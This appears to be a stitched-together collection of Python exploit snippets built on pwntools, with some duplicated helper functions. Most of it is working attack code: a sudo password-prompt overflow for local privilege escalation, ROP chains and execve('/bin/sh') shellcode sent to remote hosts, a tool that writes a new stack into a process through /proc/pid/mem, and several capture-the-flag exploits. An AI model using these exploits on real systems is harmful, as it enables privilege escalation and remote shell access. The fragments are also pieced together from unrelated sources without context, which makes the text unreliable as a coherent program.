def exploit(): mfd, sfd = pty.openpty() r = listen(12345) process("sudo -S id < " + os.ttyname(sfd), shell=True, env={"SUDO_ASKPASS": filename}) payload1 = "\x00" * OFFSETS[VERSION] payload1 += p64(0xf4) # tgetpass_flags, 244 payload1 += p64(0) * 6 # user_details payload1 += "\n" payload = "" for c in payload1: payload += c if (len(payload) + 1) % 0xf0 == 0: # 240 payload += "\x15" # sudo_term_kill char sleep(1) os.write(mfd, payload) r.wait_for_connection() # r.interactive() r.sendline(b'id -a') print("%s" % r.recvline(keepends=False)) print("%s" % r.recvline(keepends=False)) r.sendline(b'exit')
def run(self): e = self.env bits = e['bits'] chrs = e['chrs'] lock = e['lock'] disp = e['disp'] verify = e['verify'] s = '' offset = 0 if disp: log.waitfor('') else: log.waitfor('Running SQL query') while not e['exit']: sleep(0.1) s1 = '' if e['endp'] is not None: l = e['endp'] else: l = len(bits) verified = True newline = False numb = 0 for i in range(offset, l // 8): if i in chrs: c, v = chrs[i] if v: numb += 1 if c == '\n': newline = True break if v: s1 += c else: verified = False s1 += text.red(c) else: verified = False s1 += '.' if s1 == s: continue s = s1 done = e[ 'endp'] is not None and offset + numb == l // 8 and verified if disp: log.status(s) if newline and verified or done: offset += len(s1) + 1 if disp: log.succeeded(s) s = '' if not done and disp: log.waitfor('') if done: e['exit'] = True if not disp: log.succeeded()
def run(self): global _marker _trace('\x1b[?25l') # hide curser while True: if self.running: self.update(True) else: break self.i = (self.i + 1) % len(self.spinner) pwn.sleep(0.1)
def run(self): e = self.env bits = e['bits'] chrs = e['chrs'] lock = e['lock'] disp = e['disp'] verify = e['verify'] s = '' offset = 0 if disp: log.waitfor('') else: log.waitfor('Running SQL query') while not e['exit']: sleep(0.1) s1 = '' if e['endp'] is not None: l = e['endp'] else: l = len(bits) verified = True newline = False numb = 0 for i in range(offset, l // 8): if i in chrs: c, v = chrs[i] if v: numb += 1 if c == '\n': newline = True break if v: s1 += c else: verified = False s1 += text.red(c) else: verified = False s1 += '.' if s1 == s: continue s = s1 done = e['endp'] is not None and offset + numb == l // 8 and verified if disp: log.status(s) if newline and verified or done: offset += len(s1) + 1 if disp: log.succeeded(s) s = '' if not done and disp: log.waitfor('') if done: e['exit'] = True if not disp: log.succeeded()
def splash(): log.trace('\x1b[G\x1b[?25l') for c in range(8): for line in _lines: log.trace(color(c % 8, line) + '\n') sleep(0.005) for _ in _lines: log.trace('\x1b[F') for line in _lines: log.trace(line + '\n') log.trace('\x1b[?25h')
def splash(): """Put this at the beginning of your exploit to create the illusion that your sploit is enterprisey and top notch quality""" log.trace('\x1b[G\x1b[?25l') for c in range(8): for line in _lines: log.trace(color(c % 8, line) + '\n') sleep(0.005) for _ in _lines: log.trace('\x1b[F') for line in _lines: log.trace(line + '\n') log.trace('\x1b[?25h')
def pause(n = None): """Waits for either user input or a specific number of seconds.""" try: if n is None: log.info('Paused (press enter to continue)') raw_input('') else: log.waitfor('Continueing in') for i in range(n, 0, -1): log.status('%d... ' % i) pwn.sleep(1) log.succeeded('Now') except KeyboardInterrupt: log.warning('Interrupted') sys.exit(1)
def pause(n=None): """Waits for either user input or a specific number of seconds.""" try: if n is None: pwn.log.info('Paused (press enter to continue)') raw_input('') else: pwn.log.waitfor('Continueing in') for i in range(n, 0, -1): pwn.log.status('%d... ' % i) pwn.sleep(1) pwn.log.succeeded('Now') except KeyboardInterrupt: pwn.log.warning('Interrupted') sys.exit(1)
def main(): p = get_process() user_name = 'A' * 8 + '\x05' payload = 'login %s' % user_name p.clean(timeout=0.5) p.sendline(payload) p.sendline('reset') p.clean(timeout=0.5) p.sendline('login root') p.sendline('get-flag') sleep(1) print(p.recv(2048)) p.sendline('quit') p.close()
def main(): p = remote(ExploitInfo.host, ExploitInfo.port) exit_got = ExploitInfo.elf.got['exit'] win_addr = ExploitInfo.elf.sym['win'] log.info('GOT exit : 0x%x', exit_got) log.info('ADDR win : 0x%x', win_addr) p.clean() p.sendline(hex(exit_got)) sleep(1) p.sendline(hex(win_addr)) p.clean() log.success("Rejoice me!") p.sendline('ls -l') p.interactive()
def exploit(self): libc = ctypes.cdll.LoadLibrary(libc_name) LONG_MAX = 2147483647 """ roulette.c """ ROULETTE_SIZE = 36 ROULETTE_SPINS = 128 MAX_WINS = 16 HOTSTREAK = 3 s = 12500 q = 1.1 SLEEP_TIME_SPIN = Attack.calculate_sleep_time(s, q, ROULETTE_SIZE, ROULETTE_SPINS) with self.get_process(ld_preload=True) as self.p: seed = self.get_seed() libc.srand(seed) log.info('seed: %r', seed) choice = 1 for _ in xrange(HOTSTREAK): balance = self.get_balance() log.info('current balance: %r', balance) wager = (libc.rand() % ROULETTE_SIZE) + 1 junk = libc.rand() # not send self.send_bet_and_choice(str(0), str(wager)) log.info("sleep %r", SLEEP_TIME_SPIN) sleep(SLEEP_TIME_SPIN) for _ in xrange(HOTSTREAK + 1): balance = self.get_balance() log.info('current balance: %r', balance) wager = (libc.rand() % ROULETTE_SIZE) + 1 junk = libc.rand() # not send self.send_bet_and_choice(str(3994967295), str(1)) log.info("sleep %r", SLEEP_TIME_SPIN) sleep(SLEEP_TIME_SPIN) sleep(2) print(self.p.recvall())
def f(n): try: while True: sleep(0.001) finally: print 'EXIT', n
offset = 0x4b0f80 io.sendlineafter(" :", str(offset)) # gdb.attach(io, '''b *0x4b0f78\nc''') data = asm(''' mov rsi, rsp mov rdx, r12 pop rdi syscall ret ''').encode('hex') print(len(data)) assert len(data) <= 20 io.sendlineafter(":", data) sleep(0.01) from struct import pack p = lambda x: pack('Q', x) IMAGE_BASE_0 = 0x0000000000400000 # 577e6f13d080302dd4c6e653134fee0234c7b4b4a9b03c849f6d0b176aa379b2 rebase_0 = lambda x: p(x + IMAGE_BASE_0) rop = '' rop += 'padding\0' rop += rebase_0(0x0000000000020d7c) # 0x0000000000420d7c: pop r13; ret; rop += '//bin/sh' rop += rebase_0(0x0000000000020bb0) # 0x0000000000420bb0: pop r12; ret; rop += rebase_0(0x00000000005b4ea0)
def main(shellcode, delta_stack, dct_args, libs_args, mode): pid = dct_args['pid'] log.info('Analysing /proc/{}/maps on remote/local system'.format(pid)) path_to_maps = '/proc/{}/maps'.format(pid) path_to_mem = '/proc/{}/mem'.format(pid) if 'sftp' in dct_args: sftp = dct_args['sftp'] sftp.get(path_to_maps, '/tmp/maps') path_to_maps = '/tmp/maps' f = open(path_to_maps, 'r') lines = f.readlines() f.close() dct = Maps().gen_dct(lines, libs_args) arch = dct['arch'] for lst in libs_args: if lst[0] not in dct.keys(): log.warning('{} not found'.format(lst[0])) sys.exit(0) pathname = dct[lst[0]]['pathname'] if '[' not in pathname: if 'sftp' in dct_args: sftp.get(pathname, '/tmp/{}'.format(lst[0])) dct[lst[0]]['filepath'] = '/tmp/{}'.format(lst[0]) else: dct[lst[0]]['filepath'] = dct[lst[0]]['pathname'] e = ELF(dct['libc']['filepath']) dct_addrs = {} def add_addr(shift, bytes, name, comment='', shape=''): try: if shape == 'symbol': addr = shift + e.symbols[bytes] else: addr = shift + next(e.search(bytes)) dct_addrs[name] = addr print('[+] {} ; {}'.format(hex(addr), comment)) except: print('[-] {} not found'.format(name)) shift_to_libc = int(dct['libc']['addr_start'], 16) dct_addrs['stack_top_addr'] = int(dct['[stack]']['addr_start'], 16) dct_addrs['stack_both_addr'] = int(dct['[stack]']['addr_end'], 16) add_addr(shift_to_libc, b'mprotect', 'mprotect_addr', 'mprotect', 'symbol') add_addr(shift_to_libc, b'execve', 'execve_addr', 'execve', 'symbol') add_addr(shift_to_libc, b'\xc3', 'ret_addr', 'ret') if arch == 32: add_addr(shift_to_libc, b'\xcd\x80', 'int80h_addr', 'int 0x80') add_addr(shift_to_libc, b'\x61\xc3', 'popa_ret_addr', 'popa; ret') add_addr(shift_to_libc, b'\xff\xd6', 'call_esi_addr', 'call esi') else: add_addr(shift_to_libc, b'\x5f\xc3', 'pop_rdi', 'pop rdi; ret') add_addr(shift_to_libc, b'\x5e\xc3', 'pop_rsi', 'pop rsi; ret') add_addr(shift_to_libc, b'\x5a\xc3', 'pop_rdx', 'pop rdx; ret') if 'sftp' in dct_args: m = sftp.open(path_to_mem, 'w+b') else: m = open(path_to_mem, 'w+b') if m.writable(): log.info('Good, \'r/w\' permissions for /proc/{}/mem'.format(pid)) else: log.warning('Fatal error. No \'r/w\' permissions') m.close() sys.exit(0) real_stack_size = dct_addrs['stack_both_addr'] - dct_addrs['stack_top_addr'] print('[+] real stack size: {}'.format(str(real_stack_size))) stack_size = real_stack_size - delta_stack # new stack print('[+] current stack size: {}'.format(str(stack_size))) new_stack = stack(shellcode, stack_size, dct_addrs, arch, mode) # write stack from start m.seek(dct_addrs['stack_top_addr']) log.info('Pushing new stack to {}'.format(hex(dct_addrs['stack_top_addr']))) sleep(dct_args['sleep']) try: m.write(new_stack) except paramiko.SSHException: log.success('Excellent, the program dropped the connection') sys.exit(0) except paramiko.sftp.SFTPError: log.success('Excellent, the program sent the garbage packet') sys.exit(0) log.info('Not bad, the program is working fine') m.close() sftp.close()
nop nop nop nop nop nop nop nop nop nop nop nop nop push rax xor rdx, rdx xor rsi, rsi mov rbx, 0x0068732f6e69622f push rbx push rsp pop rdi mov al, 59 syscall ''') rem.send(shellcode1) pwn.sleep(1) rem.send(shellcode2) rem.interactive()